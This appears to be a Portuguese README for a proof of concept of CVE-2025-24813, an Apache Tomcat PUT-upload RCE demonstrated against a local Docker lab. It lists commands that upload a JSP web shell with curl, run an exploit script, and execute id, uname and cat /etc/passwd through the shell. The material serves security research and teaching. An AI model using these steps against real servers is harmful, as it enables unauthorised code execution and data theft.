
Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit & PoC
Este repositório contém uma prova de conceito (PoC) completa para a CVE-2025-24813, uma vulnerabilidade de Execução Remota de Código (RCE) no Apache Tomcat que utiliza o método HTTP PUT para implantar um web shell malicioso em JSP.
🔥 Este exploit demonstra como um atacante pode obter RCE por meio de upload de arquivos e execução de payloads em instâncias do Tomcat configuradas de forma insegura.
CVE-2025-24813/
├── docker/
│ ├── Dockerfile
│ └── web.xml
├── exploit/
│ ├── 1_exploit_cve_2025_24813.py
│ └── shell.jsp
├── screenshots/
│ ├── 1_tomcat_running.png
│ ├── 2_docker_started.png
│ ├── 3_upload_shell.png
│ ├── 4_run_python_exploit.png
│ ├── 5_access_shell_whoami.png
│ ├── 6_view_etc_passwd.png
│ ├── 7_run_uname.png
│ ├── 8_run_id.png
│ └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat
📸 
📸 
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp
📸 
python3 exploit/1_exploit_cve_2025_24813.py
📸 
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd
📸 
📸 
📸 
📸 
📸 
web.xml ou na configuração do servidorEste projeto é apenas para fins educacionais e de pesquisa. Testar, explorar ou usar sistemas que você não possui ou sem autorização é ilegal e antiético.
Shivshant Patil
Ethical Hacker Certificado (CEH v13)
Graduado em Engenharia da Computação (B.Tech)
🔗 LinkedIn
🔗 GitHub